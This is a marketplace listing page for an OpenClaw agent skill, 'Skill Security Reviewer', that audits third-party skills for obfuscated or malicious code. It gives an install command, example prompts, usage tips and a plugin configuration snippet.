ClawKit Logo
ClawKitReliability Toolkit
Back to Registry
Official Verified developer tools Safety 5/5

Skill Security Reviewer

Skill by ninjagpt

Why use this skill?

Use the Skill Security Reviewer to scan OpenClaw skills for malicious code, obfuscation, and encryption. Keep your workspace safe with deep threat analysis.

skill-install — Terminal

Install via CLI (Recommended)

clawhub install openclaw/skills/skills/ninjagpt/skill-security-reviewer
Or

What This Skill Does

The Skill Security Reviewer is a specialized auditing tool designed for OpenClaw users to assess the safety and integrity of third-party skills before installation. As an enhanced malicious skill detection agent, it operates by scanning the target skill's codebase for hidden threats. Version 3.0.0 brings significant advancements, including sophisticated anti-obfuscation and anti-evasion detection. It can identify and de-obfuscate hidden commands, recognize complex encoding schemes like Base64, Hex, ROT13, XOR, and even detect encrypted content through entropy analysis. The primary goal of this skill is to answer the core question: 'If a user installs this skill, what will it actually do to them?' By uncovering hidden data exfiltration, unauthorized file modifications, or malicious system calls disguised as innocuous code, it serves as a critical first line of defense in maintaining a secure OpenClaw environment. The output is a generated security report that itemizes identified threats and assesses overall risk.

Installation

To install the Skill Security Reviewer, use the following command in your OpenClaw terminal: clawhub install openclaw/skills/skills/ninjagpt/skill-security-reviewer

Use Cases

This skill is indispensable for:

  • Auditing untrusted or community-sourced skills before enabling them on your local system.
  • Performing routine security checks on existing, heavily modified, or updated skills.
  • Analyzing skills that exhibit strange behavior or unexpected network/system activity.
  • Providing developers a way to self-audit their code for common obfuscation patterns that might look suspicious to security scanners.

Example Prompts

  1. '/skill-security-reviewer productivity-tracker' – Use this to audit a common utility skill you want to verify.
  2. '/skill-security-reviewer suspicious-crypto-miner-plugin' – Use this when you suspect a skill contains obfuscated malicious code.
  3. '/skill-security-reviewer financial-calculator-v2' – Use this to verify that an updated skill has not introduced new, hidden vulnerabilities.

Tips & Limitations

  • The skill operates on a read-only principle; it does not execute the target skill, it only inspects it.
  • While the tool is powerful, no automated auditor is perfect. Always review the final report manually if the tool flags suspicious entropy or multi-layer nesting.
  • Ensure your OpenClaw environment is updated to the latest version to support all v3.0.0 features.
  • The output reports are saved locally to your system, which allows you to maintain an audit trail of all reviewed skills for your reference.
Read Full Documentation on GitHub

Metadata

Author@ninjagpt
Stars1287
Views1
Updated2026-02-22
View Author Profile
AI Skill Finder

Not sure this is the right skill?

Describe what you want to build — we'll match you to the best skill from 16,000+ options.

Find the right skill
Add to Configuration

Paste this into your clawhub.json to enable this plugin.

{
  "plugins": {
    "official-ninjagpt-skill-security-reviewer": {
      "enabled": true,
      "auto_update": true
    }
  }
}

Tags(AI)

#security#audit#cybersecurity#safety#malware-detection
Safety Score: 5/5

Flags: file-read